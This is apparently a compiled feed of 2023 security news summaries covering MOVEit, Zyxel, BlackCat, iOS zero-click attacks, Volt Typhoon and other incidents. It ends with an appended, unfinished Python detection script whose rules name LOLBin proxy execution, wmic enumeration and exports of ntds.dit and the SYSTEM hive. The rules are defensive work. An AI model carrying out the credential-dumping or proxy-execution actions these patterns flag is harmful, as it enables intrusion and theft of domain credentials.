                CISA adds Progress MOVEit Transfer zero-day to its Known Exploited Vulnerabilities catalog

                exploits
                2023-06-02 https://securityaffairs.com/146998/security/cisa-moveit-transfer-0day-catalog.html

                US CISA added actively exploited Progress MOVEit Transfer zero-day vulnerability to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added a Progress MOVEit Transfer SQL injection vulnerability, tracked as CVE-2023-34362, to its Known Exploited Vulnerabilities Catalog. Threat actors are actively exploiting a zero-day vulnerability in the Progress MOVEit Transfer file transfer product […]

                The post CISA adds Progress MOVEit Transfer zero-day to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.

                Autosummary: Pierluigi Paganini (SecurityAffairs – hacking, CISA)


                Update now! MOVEit Transfer vulnerability actively exploited

                exploits
                2023-06-02 https://www.malwarebytes.com/blog/news/2023/06/update-now-moveit-transfer-vulnerability-actively-exploited

                Categories: Exploits and vulnerabilities, News

                Tags: Progress, MOVEit, vulnerability, human2.aspx

                A critical vulnerability in Progress MOVEit Transfer is being used to steal large amounts of data


                The post Update now! MOVEit Transfer vulnerability actively exploited appeared first on Malwarebytes Labs.

                Autosummary: It is important to note that, until HTTP and HTTPS traffic is enabled again: users will not be able to log on to the MOVEit Transfer web UI; MOVEit Automation tasks that use the native MOVEit Transfer host will not work; REST, Java and .NET APIs will not work; the MOVEit Transfer add-in for Outlook will not work; SFTP and FTP/s protocols will continue to work as normal; and administrators will still be able to access MOVEit Transfer by using a remote desktop to access the Windows machine and then accessing https://localhost/. This allows the attacker to obtain a list of all folders, files, and users within MOVEit, download any file within MOVEit, and insert an administrative backdoor user, giving attackers an active session to allow credential bypass. The Cybersecurity and Infrastructure Security Agency (CISA) is urging users and organizations to review the MOVEit Transfer Advisory, follow the mitigation steps, apply the necessary updates, and hunt for any malicious activity.


                Why organizations should adopt a cloud cybersecurity framework

                ciber
                2023-06-01 https://www.helpnetsecurity.com/2023/06/01/cloud-cybersecurity-framework/

                The cloud is the future of enterprise architecture. It’s economical (to a degree), it’s scalable, it’s flexible and – best of all – it’s someone else’s responsibility. Again, to a point. That’s because the cloud comes with its own set of security and governance challenges. 1. Controlling the sprawl An average employee uses about 36 cloud-based services daily, while enterprises store about 60% of their data on the cloud. Controlling this sudden, often unintended explosion … More

                The post Why organizations should adopt a cloud cybersecurity framework appeared first on Help Net Security.

                Autosummary: Every CSP will implement security differently and every cloud model (software-as-a-service, infrastructure-as-a-service, platform-as-a-service, etc.) will have varying degrees of security control ownership, which is why it might be difficult for them to meet all security requirements. There are a number of different cloud cybersecurity control frameworks available, including the Cloud Controls Matrix (CCM) proposed by the Cloud Security Alliance, the Information Security Forum’s Standard of Good Practice (SOGP), the National Institute of Standards and Technology (NIST) Cybersecurity Framework, and the ISO/IEC 27002. They help organizations maintain a record of cloud services, their usage, security controls and capabilities across on-premises, off-premises, private and public cloud.


                Navigating cybersecurity in the age of remote work

                ciber
                2023-06-01 https://www.helpnetsecurity.com/2023/06/01/jay-chaudhry-zscaler-cybersecurity-remote-work/

                In this Help Net Security interview, Jay Chaudhry, CEO at Zscaler, talks about connecting and securing remote employees and their devices to access organizational resources from any location. He discusses the potential risks of remote VPN access, the increasing reliance on personal devices, and transitioning to a cloud-first model. We’ll examine the impact of the shifting role of data centers on network strategies, the implementation of a zero-trust security framework, and how 5G networks might … More

                The post Navigating cybersecurity in the age of remote work appeared first on Help Net Security.

                Autosummary: In today’s hybrid world, your data is often sitting in public clouds like Azure and AWS, in SaaS applications, in data centers, factories, and on your endpoints. We’ll examine the impact of the shifting role of data centers on network strategies, the implementation of a zero-trust security framework, and how 5G networks might further decentralize workplaces. How should CISOs manage the security concerns of employees working remotely and using personal devices to access organizational resources? This works well for employees, but if someone steals an employee’s VPN login credentials, they can get on the corporate network, move laterally to find high-value assets and launch a ransomware attack or exfiltrate data.


                Fighting ransomware: Perspectives from cybersecurity professionals

                exploits ransomware ciber
                2023-06-01 https://www.helpnetsecurity.com/2023/06/01/ransomware-experts-round-up-video/

                Ransomware has become an ever-present threat to individuals, businesses, and even entire nations. In this Help Net Security round-up, we present parts of previously recorded videos from experts in the field that shed light on the pressing ransomware issues. Complete videos David Mahdi, Chief Strategy Officer & CISO Advisory at Sectigo, talks about how ransomware isn’t solely a malware problem; bad actors want access to your data, so it really is a data security and … More

                The post Fighting ransomware: Perspectives from cybersecurity professionals appeared first on Help Net Security.

                "

                Autosummary: "


                Phishing campaigns thrive as evasive tactics outsmart conventional detection

                financial industry
                2023-06-01 https://www.helpnetsecurity.com/2023/06/01/advanced-detection-evasion-techniques/

                A 25% increase in the use of phishing kits has been recorded in 2022, according to Group-IB. The key phishing trends observed are the increasing use of access control and advanced detection evasion techniques. The rise in evasive tactics, such as antibot techniques and randomization, poses a significant challenge for conventional detection systems and extends the lifespan of phishing campaigns. 3,677 unique phishing kits in 2022 have been identified, 25% more than in 2021. A … More

                The post Phishing campaigns thrive as evasive tactics outsmart conventional detection appeared first on Help Net Security.

                "

                Autosummary: For example, in 2022, approximately 1,500 phishing kits contained the functionality for transferring stolen data either via Telegram, email or by writing the data to a file locally on the server, which indicates their growing sophistication. Notably, in 2022, Group-IB researchers observed a 40% increase in the use of anti-bot technologies designed to prevent automated cybersecurity scanners from identifying phishing content. "


                Active Mirai Botnet Variant Exploiting Zyxel Devices for DDoS Attacks

                exploits
                2023-06-01 https://thehackernews.com/2023/06/active-mirai-botnet-variant-exploiting.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a recently patched critical security flaw in Zyxel gear to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2023-28771 (CVSS score: 9.8), the issue relates to a command injection flaw impacting different firewall models that could enable an unauthenticated attacker "

                Autosummary: VPN (versions ZLD V4.60 to V5.35, patched in ZLD V5.36), and ZyWALL/USG (versions ZLD V4.60 to V4.73, patched in ZLD V4.73 Patch 1) The Shadowserver Foundation, in a recent tweet, said the flaw is "being actively exploited to build a Mirai-like botnet" since May 26, 2023. "


                Improved BlackCat Ransomware Strikes with Lightning Speed and Stealthy Tactics

                exploits ransomware industry
                2023-06-01 https://thehackernews.com/2023/06/improved-blackcat-ransomware-strikes.html
The threat actors behind BlackCat ransomware have come up with an improved variant that prioritizes speed and stealth in an attempt to bypass security guardrails and achieve their goals. The new version, dubbed Sphynx and announced in February 2023, packs a "number of updated capabilities that strengthen the group’s efforts to evade detection," IBM Security X-Force said in a new analysis. The "

                Autosummary: Sphynx also incorporates a loader to decrypt the ransomware payload that, upon execution, performs network discovery activities to hunt for additional systems, deletes volume shadow copies, encrypts files, and finally drops the ransom note. "


                N. Korean ScarCruft Hackers Exploit LNK Files to Spread RokRAT

                exploits
                2023-06-01 https://thehackernews.com/2023/06/n-korean-scarcruft-hackers-exploit.html
Cybersecurity researchers have offered a closer look at the RokRAT remote access trojan that’s employed by the North Korean state-sponsored actor known as ScarCruft. "RokRAT is a sophisticated remote access trojan (RAT) that has been observed as a critical component within the attack chain, enabling the threat actors to gain unauthorized access, exfiltrate sensitive information, and potentially "

                Autosummary: "


                Widespread exploitation by botnet operators of Zyxel firewall flaw

                exploits
                2023-06-01 https://securityaffairs.com/146901/hacking/zyxel-firewall-flaw-botnet.html

Threat actors are actively exploiting a command injection flaw, tracked as CVE-2023-28771, in Zyxel firewalls to install malware. Threat actors are actively attempting to exploit a command injection vulnerability, tracked as CVE-2023-28771, that impacts Zyxel firewalls. Their objective is to leverage this vulnerability to deploy and install malware on the affected systems. US CISA added the […]

                The post Widespread exploitation by botnet operators of Zyxel firewall flaw appeared first on Security Affairs.

                "

Autosummary: "


                Harvard Pilgrim Health Care ransomware attack hits 2.5 million people

                exploits ransomware
                2023-06-01 https://www.bleepingcomputer.com/news/security/harvard-pilgrim-health-care-ransomware-attack-hits-25-million-people/
                Harvard Pilgrim Health Care (HPHC) has disclosed that a ransomware attack it suffered in April 2023 impacted 2,550,922 people, with the threat actors also stealing their sensitive data from compromised systems. [...] "

Autosummary: The stolen files include the following types of sensitive information: full names, physical addresses, phone numbers, dates of birth, health insurance account information, Social Security numbers, provider taxpayer identification numbers, and clinical information, including medical history, diagnoses, treatment, dates of service, and provider names. The organization has clarified that the incident impacts current and former members of Harvard Pilgrim, who had a registration date starting on March 28, 2012. "


                Google triples rewards for Chrome sandbox escape chain exploits

                exploits
                2023-06-01 https://www.bleepingcomputer.com/news/google/google-triples-rewards-for-chrome-sandbox-escape-chain-exploits/
                Google announced today that bug bounty hunters who report sandbox escape chain exploits targeting its Chrome web browser are now eligible for triple the standard reward until December 1st, 2023. [...] "

                Autosummary: In August, the company also announced that it would pay for bugs reported in the latest released versions of Google open-source software, including projects like Bazel, Angular, Golang, Protocol buffers, and Fuchsia. "


                New MOVEit Transfer zero-day mass-exploited in data theft attacks

                exploits
                2023-06-01 https://www.bleepingcomputer.com/news/security/new-moveit-transfer-zero-day-mass-exploited-in-data-theft-attacks/
                Hackers are actively exploiting a zero-day vulnerability in the MOVEit Transfer file transfer software to steal data from organizations. [...] "

Autosummary: Webshell installed by exploit on MOVEit Transfer Servers (Source: BleepingComputer). From analysis by BleepingComputer, when the webshell is accessed and the correct password supplied, the script will execute various commands based on the value of the "X-siLock-Step1", "X-siLock-Step1", and "X-siLock-Step3" request headers. According to Progress, MOVEit Transfer is used by thousands of enterprises, including Chase, Disney, GEICO, and MLB, as well as 1,700 software companies and 3.5 million developers. "


                Decade-old critical vulnerability in Jetpack patched on millions of WordPress websites

                exploits
                2023-06-01 https://www.tripwire.com/state-of-security/decade-old-critical-vulnerability-jetpack-patched-millions-wordpress-websites
Jetpack, an extremely popular WordPress plugin that provides a variety of functions including security features for around five million websites, has received a critical security update following the discovery of a bug that has lurked unnoticed since 2012. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: "


                Secureworks strengthens industrial cybersecurity with two new offerings

                industry ciber
                2023-06-01 https://www.helpnetsecurity.com/2023/06/01/secureworks-taegis-managedxdr/

                Secureworks has launched two new offerings to unify the way industrial organizations prevent, detect, and respond to threats across the OT and IT landscapes. The convergence of OT and IT in the industrial sector brings technological and economic benefits, but also increases risk. The more OT systems are digitally connected, the larger the overall attack surface becomes, making OT an increasingly attractive target for threat actors. This, combined with a global cybersecurity talent shortage numbering … More

                The post Secureworks strengthens industrial cybersecurity with two new offerings appeared first on Help Net Security.

                "

Autosummary: The solution includes: 24×7 threat monitoring with unlimited access to security experts in 90 seconds or less, collaborative design of OT and IT response processes, customizable rules and playbooks, quarterly expert security reviews, monthly threat hunting, onboarding support, and access to proactive services (including incident response planning and adversarial testing). “Their risks include unplanned shutdowns, financial losses, and harm to human populations that rely on critical services,” said Kyle Falkenhagen, CPO, Secureworks. "


                Nozomi and Cynalytica team to deliver security solutions to OT & IoT environments

                industry
                2023-06-01 https://www.helpnetsecurity.com/2023/06/01/nozomi-and-cynalytica-team-to-deliver-security-solutions-to-ot-iot-environments/

                Nozomi Networks and Cynalytica have unveiled they have partnered to provide a visibility, monitoring and threat detection solution that encompasses both TCP/IP-based and non-IP based serial bus and analog connections found in OT and IoT environments. The joint solution simplifies the challenge of addressing security across modernized and legacy systems, and converges security monitoring across an unlimited number of facilities and systems to a central location. “The current cybersecurity challenges and gaps faced by ICS/SCADA … More

                The post Nozomi and Cynalytica team to deliver security solutions to OT & IoT environments appeared first on Help Net Security.

                "

                Autosummary: "


                Critical zero-day vulnerability in MOVEit Transfer exploited by attackers!

                exploits
                2023-06-01 https://www.helpnetsecurity.com/2023/06/01/moveit-transfer-vulnerability/

                A critical zero-day vulnerability in Progress Software’s enterprise managed file transfer solution MOVEit Transfer is being exploited by attackers to grab corporate data. “[The vulnerability] could lead to escalated privileges and potential unauthorized access to the environment,” the company warned on Wednesday, and advised customers to take action to protect their MOVEit Transfer environment, “while our team produces a patch.” The alert also tells them to check for indicators of unauthorized access over at least … More

                The post Critical zero-day vulnerability in MOVEit Transfer exploited by attackers! appeared first on Help Net Security.

                "

Autosummary: Progress Software advised users to temporarily disable all HTTP and HTTPS traffic to their MOVEit Transfer environment, and to upgrade to one of the fixed versions: MOVEit Transfer 2023.0.1, MOVEit Transfer 2022.1.5, MOVEit Transfer 2022.0.4, MOVEit Transfer 2021.1.4, or MOVEit Transfer 2021.0.6. They also advised customers to check whether unexpected files have been created in the c:\MOVEit Transfer\wwwroot\ folder on all their MOVEit Transfer instances, and whether unexpected or large file downloads have been performed. "


                Evasive QBot Malware Leverages Short-lived Residential IPs for Dynamic Attacks

                exploits
                2023-06-01 https://thehackernews.com/2023/06/evasive-qbot-malware-leverages-short.html
An analysis of the "evasive and tenacious" malware known as QBot has revealed that 25% of its command-and-control (C2) servers are merely active for a single day. What’s more, 50% of the servers don’t remain active for more than a week, indicating the use of an adaptable and dynamic C2 infrastructure, Lumen Black Lotus Labs said in a report shared with The Hacker News. "This botnet has adapted "

                Autosummary: "This botnet has adapted techniques to conceal its infrastructure in residential IP space and infected web servers, as opposed to hiding in a network of hosted virtual private servers (VPSs)," security researchers Chris Formosa and Steve Rudd said. "


                New Zero-Click Hack Targets iOS Users with Stealthy Root-Privilege Malware

                exploits
                2023-06-01 https://thehackernews.com/2023/06/new-zero-click-hack-targets-ios-users.html
                A previously unknown advanced persistent threat (APT) is targeting iOS devices as part of a sophisticated and long-running mobile campaign dubbed Operation Triangulation that began in 2019. "The targets are infected using zero-click exploits via the iMessage platform, and the malware runs with root privileges, gaining complete control over the device and user data," Kaspersky said. The Russian "

                Autosummary: "The targets are infected using zero-click exploits via the iMessage platform, and the malware runs with root privileges, gaining complete control over the device and user data," Kaspersky said. "


                Powerful artificial-intelligence ban possible, government adviser warns

                government
                2023-06-01 https://www.bbc.co.uk/news/technology-65779181?at_medium=RSS&at_campaign=KARANGA
Systems above a certain power may need to be stopped, a member of the government’s AI Council says. "

                Autosummary: "


                US hospital forced to divert ambulances after cyberattack

                ciber
                2023-06-01 https://www.malwarebytes.com/blog/news/2023/06/us-hospital-forced-to-divert-ambulances-after-cyberattack


                The Idaho Falls Community Hospital fell victim to a cyberattack on Monday and had to divert ambulances to nearby hospitals and close some of its clinics.


                The post US hospital forced to divert ambulances after cyberattack appeared first on Malwarebytes Labs.

                "

Autosummary: Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files. While the exact nature of the cyberattack is unknown at this point and the hospital calls it a “virus”, it is more likely that it is dealing with a ransomware attack. "


                Operation Triangulation: previously undetected malware targets iOS devices

                exploits
                2023-06-01 https://securityaffairs.com/146939/apt/operation-triangulation-ios-devices.html

                A previously undocumented APT group targets iOS devices with zero-click exploits as part of a long-running campaign dubbed Operation Triangulation. Researchers from the Russian firm Kaspersky have uncovered a previously unknown APT group that is targeting iOS devices with zero-click exploits as part of a long-running campaign dubbed Operation Triangulation. The experts uncovered the attack while monitoring […]

                The post Operation Triangulation: previously undetected malware targets iOS devices appeared first on Security Affairs.

                "

Autosummary: Kaspersky provided the list of C2 domains involved in the attack; at least two of them currently show the following banner: "


                Managing mental health in cybersecurity

                ciber
                2023-05-31 https://www.helpnetsecurity.com/2023/05/31/managing-mental-health-in-cybersecurity-video/

                In this Help Net Security video, Jason Lewkowicz, Chief Services Officer at Optiv, discusses mental health in cybersecurity, which needs more attention. There is a confluence of factors – from the cybersecurity talent shortage and reductions in force to volatile financial markets and stagnant budgets – forcing cybersecurity professionals at all levels to work beyond their standard capacity on any given day, leading to emotional stress and burnout. Add a cyber incident to the mix, … More

                The post Managing mental health in cybersecurity appeared first on Help Net Security.

                "

                Autosummary: "


                Organizations are placing OT cybersecurity responsibility on CISOs

                ciber
                2023-05-31 https://www.helpnetsecurity.com/2023/05/31/ot-cybersecurity-responsibility/

                Protecting operational technology (OT) systems is now more critical than ever as more organizations connect their OT environments to the internet, according to Fortinet. Although IT/OT convergence has many benefits, it is being hampered and handicapped by advanced and destructive cyberthreats. The spillover of these attacks is increasingly targeted at OT environments. “Fortinet’s report shows that while OT organizations have improved their overall cybersecurity posture, they also have continued opportunity for improvement. Networking and IT … More

                The post Organizations are placing OT cybersecurity responsibility on CISOs appeared first on Help Net Security.

                "

                Autosummary: Intrusions from malware (56%) and phishing (49%) were once again the most common type of incidents reported, and nearly one-third of respondents reported being victims of a ransomware attack in the last year (32%, unchanged from 2022). In 2023, the number of respondents who consider their organization’s OT security posture as “highly mature” fell to 13% from 21% the year before, suggesting growing awareness among OT professionals and more effective tools for self-assessing their organizations’ cybersecurity capabilities. "


                Alert: Hackers Exploit Barracuda Email Security Gateway 0-Day Flaw for 7 Months

                exploits
                2023-05-31 https://thehackernews.com/2023/05/alert-hackers-exploit-barracuda-email.html
                Enterprise security firm Barracuda on Tuesday disclosed that a recently patched zero-day flaw in its Email Security Gateway (ESG) appliances had been abused by threat actors since October 2022 to backdoor the devices. The latest findings show that the critical vulnerability, tracked as CVE-2023-2868 (CVSS score: N/A), has been actively exploited for at least seven months prior to its discovery. "

                Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA), last week, also added the bug to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply the fixes by June 16, 2023. "


                Venezuela pays people to tweet state propaganda and deepfake videos

                government
                2023-05-31 https://grahamcluley.com/venezuela-pays-people-to-tweet-state-propaganda-and-deepfake-videos/
                The BBC reports that the Venezuelan government is paying people to tweet in support of it, in an attempt to drown out the noise of its critics. "

                Autosummary: "


                Microsoft found a new bug that allows bypassing SIP root restrictions in macOS

                exploits
                2023-05-31 https://securityaffairs.com/146853/security/macos-sip-root-restrictions-bypass.html

                Apple fixed a vulnerability discovered by Microsoft researchers that lets attackers with root privileges bypass System Integrity Protection (SIP). Researchers from Microsoft discovered a vulnerability, tracked as CVE-2023-32369 and dubbed Migraine, that can allow attackers with root privileges to bypass System Integrity Protection (SIP). System Integrity Protection (also referred to as rootless) is a macOS security feature […]

                The post Microsoft found a new bug that allows bypassing SIP root restrictions in macOS appeared first on Security Affairs.

                "

Autosummary: Below is a video PoC that shows the exploitation of the flaw: https://www.microsoft.com/en-us/videoplayer/embed/RW14MaR The consequences of arbitrary bypasses of System Integrity Protection (SIP) could be very dangerous; malware developers can exploit it to: Create undeletable malware: Attackers can create files with the “com.apple.rootless” extended attribute or overwrite existing files with it. "


                ConnectSecure enhances its cybersecurity platform with deep attack surface scanning and EPSS

                ciber
                2023-05-31 https://www.helpnetsecurity.com/2023/05/31/connectsecure-cybersecurity-platform/

                ConnectSecure is adding deep attack surface scanning and the Exploit Prediction Scoring System (EPSS) to its cybersecurity platform for managed service providers (MSPs) that protect small and midsize businesses. The new capabilities will be fully integrated into the ConnectSecure platform, giving MSPs complete visibility into network, device, and application weaknesses that can be exploited by bad actors. While ConnectSecure regularly enhances its cybersecurity platform in response to its MSP partner community feedback, attack surface scanning … More

                The post ConnectSecure enhances its cybersecurity platform with deep attack surface scanning and EPSS appeared first on Help Net Security.

                "

                Autosummary: Specifically, ConnectSecure’s attack surface scanner will scan and identify: Open ports Targeted IP addresses Compromised emails Weak or compromised usernames Suspicious subdomains EPSS provides a dynamic, real-time score that rates software vulnerabilities based on real-world activity to determine the probability they will be exploited. "


                Zyxel patches vulnerability in NAS devices (CVE-2023-27988)

                exploits
                2023-05-31 https://www.helpnetsecurity.com/2023/05/31/cve-2023-27988/

                Zyxel has patched a high-severity authenticated command injection vulnerability (CVE-2023-27988) in some of its network attached storage (NAS) devices aimed at home users. About the vulnerability (CVE-2023-27988) The vulnerability was discovered in the devices’ web management interface. “An authenticated attacker with administrator privileges could leverage this vulnerability to execute some operating system (OS) commands on an affected device remotely,” Zyxel has confirmed. The following versions of the Zyxel NAS devices are affected: NAS326 version 5.21(AAZF.12)C0 … More

                The post Zyxel patches vulnerability in NAS devices (CVE-2023-27988) appeared first on Help Net Security.

                "

                Autosummary: "


                Microsoft Details Critical Apple macOS Vulnerability Allowing SIP Protection Bypass

                exploits
                2023-05-31 https://thehackernews.com/2023/05/microsoft-details-critical-apple-macos.html
                Microsoft has shared details of a now-patched flaw in Apple macOS that could be abused by threat actors with root access to bypass security enforcements and perform arbitrary actions on affected devices. Specifically, the flaw – dubbed Migraine and tracked as CVE-2023-32369 – could be abused to get around a key security measure called System Integrity Protection (SIP), or “rootless,” which "

                Autosummary: Migraine is the latest addition to the list of macOS security bypasses that have been documented under the names Shrootless (CVE-2021-30892, CVSS score: 5.5), powerdir (CVE-2021-30970, CVSS score: 5.5), and Achilles (CVE-2022-42821, CVSS score: 5.5). "


                Threat actors are exploiting Barracuda Email Security Gateway bug since October 2022

                exploits
                2023-05-31 https://securityaffairs.com/146876/hacking/barracuda-esg-bug-exploited-since-oct.html

A recently disclosed zero-day flaw in Barracuda Email Security Gateway (ESG) appliances had been actively exploited by attackers since October 2022. The network security solutions provider Barracuda recently warned customers that some of its Email Security Gateway (ESG) appliances were recently breached by threat actors exploiting a now-patched zero-day vulnerability. The vulnerability, tracked as CVE-2023-2868, resides […]

                The post Threat actors are exploiting Barracuda Email Security Gateway bug since October 2022 appeared first on Security Affairs.

                "

Autosummary: Rotate any applicable credentials connected to the ESG appliance: any connected LDAP/AD, Barracuda Cloud Control, FTP server, SMB, and any private TLS certificates. Review your network logs for any of the IOCs listed below and any unknown IPs. "


                Swiss real estate agency Neho fails to put a password on its systems

                government
                2023-05-31 https://securityaffairs.com/146879/data-breach/neho-data-exposed.html

                A misconfiguration of Swiss real estate agency Neho’s systems exposed sensitive credentials to the public. Neho, a Switzerland-based real estate agency, leaked credentials recently, potentially allowing threat actors to prey on sensitive data about the company and its clients. The Cybernews research team discovered a misconfiguration in the Neho.ch website that exposed sensitive credentials to […]

                The post Swiss real estate agency Neho fails to put a password on its systems appeared first on Security Affairs.

                "

Autosummary: Credentials leaked included: PostgreSQL database host, port, name, and password; Redis database host, port, and password; Mailgun host, username, and password; Postmark API and SMTP credentials; AWS bucket access key ID and secret; Twilio account credentials; Aircall API and tokens; Elastic search AWS credentials; Google client ID and secret; Facebook client ID and secret; Trustpilot API key and secret; Pricehubble credentials; Movu.ch token; Canny ID, keys and tokens; and TravelTime API. Corporate communication channels at risk: another piece of sensitive information observed was the application programming interface (API) and Simple Mail Transfer Protocol (SMTP) credentials for Postmark email-sending services. Give a look at the original post at https://cybernews.com/security/neho-real-estate-agency-data-leak/ A number of less critical credentials were also exposed, including Pricehubble credentials, Movu.ch token, Canny ID, keys and tokens, and TravelTime API. "


                Hackers exploit critical Zyxel firewall flaw in ongoing attacks

                exploits
                2023-05-31 https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-zyxel-firewall-flaw-in-ongoing-attacks/
                Hackers are performing widespread exploitation of a critical-severity command injection flaw in Zyxel networking devices, tracked as CVE-2023-28771, to install malware. [...] "

                Autosummary: "


                Stealthy SeroXen RAT malware increasingly used to target gamers

                exploits
                2023-05-31 https://www.bleepingcomputer.com/news/security/stealthy-seroxen-rat-malware-increasingly-used-to-target-gamers/
                A stealthy remote access trojan (RAT) named "SeroXen" has recently gained popularity as cybercriminals begin using it for its low detection rates and powerful capabilities. [...] "

                Autosummary: Its latest version, 1.41, features reverse proxy, remote shell, remote desktop, TLS communication, and a file management system, and is freely available through GitHub. "


                7 Stages of Application Testing: How to Automate for Continuous Security

                ransomware
                2023-05-31 https://www.bleepingcomputer.com/news/security/7-stages-of-application-testing-how-to-automate-for-continuous-security/
There are seven main stages of a complex pen testing process that must be followed in order to effectively assess an application’s security posture. Learn more from OutPost24 about these stages and how PTaaS can find flaws in web applications, [...] "

Autosummary: This includes webpages, databases, APIs, and other server-side components, network mapping, service identification, and fingerprinting. The Seven Stages of Penetration Testing: There are seven main stages of a complex pen testing process that must be followed in order to effectively assess an application’s security posture. Pre-engagement: Before beginning the actual pen testing process, it is important to properly prepare the environment and define objectives. Pen testers collect information about the target application, including architecture, technologies used, potential entry points, and user roles. With Outpost24’s PTaaS, organizations can benefit from continuous security monitoring, proactive vulnerability detection, and streamlined remediation processes. By providing one-click fixes for common issues, PTaaS simplifies the remediation process, enabling developers to quickly address vulnerabilities without extensive security expertise. "


                Dark Pink hackers continue to target govt and military organizations

                ransomware
                2023-05-31 https://www.bleepingcomputer.com/news/security/dark-pink-hackers-continue-to-target-govt-and-military-organizations/
                The Dark Pink APT hacking group continues to be very active in 2023, observed targeting government, military, and education organizations in Indonesia, Brunei, and Vietnam. [...] "

                Autosummary: These tools include "AccCheckConsole.exe," "remote.exe," "Extexport.exe," "MSPUB.exe," and "MSOHTMED.exe," which can be exploited for proxy execution, downloading additional payloads, and more. "


                Cybercriminals Targeting Apache NiFi Instances for Cryptocurrency Mining

                ciber
                2023-05-31 https://thehackernews.com/2023/05/cybercriminals-targeting-apache-nifi.html
                A financially motivated threat actor is actively scouring the internet for unprotected Apache NiFi instances to covertly install a cryptocurrency miner and facilitate lateral movement. The findings come from the SANS Internet Storm Center (ISC), which detected a spike in HTTP requests for “/nifi” on May 19, 2023. “Persistence is achieved via timed processors or entries to cron,” said Dr. "

                Autosummary: A honeypot setup allowed the ISC to determine that the initial foothold is weaponized to drop a shell script that removes the "/var/log/syslog" file, disables the firewall, and terminates competing crypto-mining tools, before downloading and launching the Kinsing malware from a remote server. "


                Critical Firmware Vulnerability in Gigabyte Systems Exposes ~7 Million Devices

                exploits
                2023-05-31 https://thehackernews.com/2023/05/critical-firmware-vulnerability-in.html
                Cybersecurity researchers have found "backdoor-like behavior" within Gigabyte systems, which they say enables the UEFI firmware of the devices to drop a Windows executable and retrieve updates in an unsecure format. Firmware security firm Eclypsium said it first detected the anomaly in April 2023. Gigabyte has since acknowledged and addressed the issue. "Most Gigabyte firmware includes a Windows "

                Autosummary: "However, the irony of a highly insecure update application, baked into firmware to automatically download and run a payload, is not lost." "


                Exploit released for RCE flaw in popular ReportLab PDF library

                exploits
                2023-05-31 https://www.bleepingcomputer.com/news/security/exploit-released-for-rce-flaw-in-popular-reportlab-pdf-library/
                A researcher has published a working exploit for a remote code execution (RCE) flaw impacting ReportLab, a popular Python library used by numerous projects to generate PDF files from HTML input. [...] "

                Autosummary: The presented PoC retrieves the built-in "type" function that helps create a new class named "Word," which inherits from the "str" class, which can bypass safety checks and give access to sensitive attributes like "code." "


                Financial services company OneMain fined $4.25 million for security lapses

                financial
                2023-05-31 https://www.malwarebytes.com/blog/news/2023/05/financial-services-company-onemain-fined-4.25-million-for-cyber-lapses

                Categories: Business

                Tags: one-man, financial, loans, cyber, lapses, security, update, New York, lapse

                We take a look at a fine totalling millions aimed at financial services company OneMain.


                The post Financial services company OneMain fined $4.25 million for security lapses appeared first on Malwarebytes Labs.

                "

                Autosummary: OneMain failed to effectively manage third-party service provider risk, manage access privileges, and maintain a formal application security development methodology, significantly increasing the company’s vulnerability to cybersecurity events. We go once more to the release: OneMain did not conduct timely due diligence for certain high- and medium-risk vendors, despite the existence of a third-party vendor management policy requiring that each vendor undergo an assessment to determine the vendor’s risk rating and the appropriate level of due diligence OneMain should perform on the vendor. "


                CISA issues warning to US businesses: Beware of China's state-sponsored cyber actor

                government
                2023-05-31 https://www.malwarebytes.com/blog/business/2023/05/cisa-issues-warning-to-us-businesses-beware-of-chinas-state-sponsored-cyber-actor

                Categories: Business

                US businesses: watch out for Volt Typhoon, a threat actor sponsored by the People’s Republic of China (PRC).


                The post CISA issues warning to US businesses: Beware of China's state-sponsored cyber actor appeared first on Malwarebytes Labs.

                "

                Autosummary: Likewise, CISA's advice to businesses emphasizes the importance of enhancing detection of potential LOTL attacks through robust logging mechanisms, inspecting abnormal account activities, and more. CISA advice, enhance monitoring and logging: use advanced monitoring systems to track unusual IP addresses, abnormal account activity, and suspicious process creations. LOTL command example: cmd.exe /C "wmic path win32_logicaldisk get caption,filesystem,freespace,size,volumename". LOTL Example #2, Credential Access: Volt Typhoon attempts to capture two vital assets from Windows Domain Controllers (DCs): the ntds.dit file and the SYSTEM registry hive. Their victims come from a wide range of industries, including communications, government, information technology (IT), education, and more. "
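                The Dark Pink item above (signed Windows binaries such as AccCheckConsole.exe and MSOHTMED.exe abused for proxy execution) and the CISA item (watch for suspicious process creations, such as Volt Typhoon's wmic disk enumeration and its collection of ntds.dit and the SYSTEM hive from domain controllers) are the same detection problem: flag process-creation events whose image or command line matches a living-off-the-land pattern. The script below is an added example, not code from Malwarebytes, CISA or either article. It runs a small rule set over constructed Windows 4688-style records flattened to one key=value line each; the LOLBin names and the wmic command come from the two items, while the ntdsutil and "reg save HKLM\SYSTEM" patterns are this example's assumption about how the two DC artefacts are usually exported. Host names, users and file paths are made up.

```python
import re
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class Rule:
    name: str
    severity: str
    image: Optional[re.Pattern]    # tested against the process image basename, or None
    cmdline: Optional[re.Pattern]  # tested against the full command line, or None

# Rule set. LOLBin names: the Dark Pink item. wmic logicaldisk enumeration: the command
# cited in the CISA/Volt Typhoon item. The ntdsutil and "reg save HKLM\SYSTEM" patterns
# are this example's assumption about how ntds.dit and the SYSTEM hive are usually
# exported from a DC; the items themselves name only the two artefacts.
RULES = [
    Rule("lolbin_proxy_exec", "medium",
         re.compile(r"^(AccCheckConsole|remote|Extexport|MSPUB|MSOHTMED)\.exe$", re.I), None),
    Rule("wmic_logicaldisk_enum", "medium", None,
         re.compile(r"\bwmic(\.exe)?\s+path\s+win32_logicaldisk\s+get\b", re.I)),
    Rule("ntds_dit_export", "high", None,
         re.compile(r"\bntdsutil\b.*\bifm\b|ntds\.dit", re.I)),
    Rule("system_hive_export", "high", None,
         re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\SYSTEM\b", re.I)),
]
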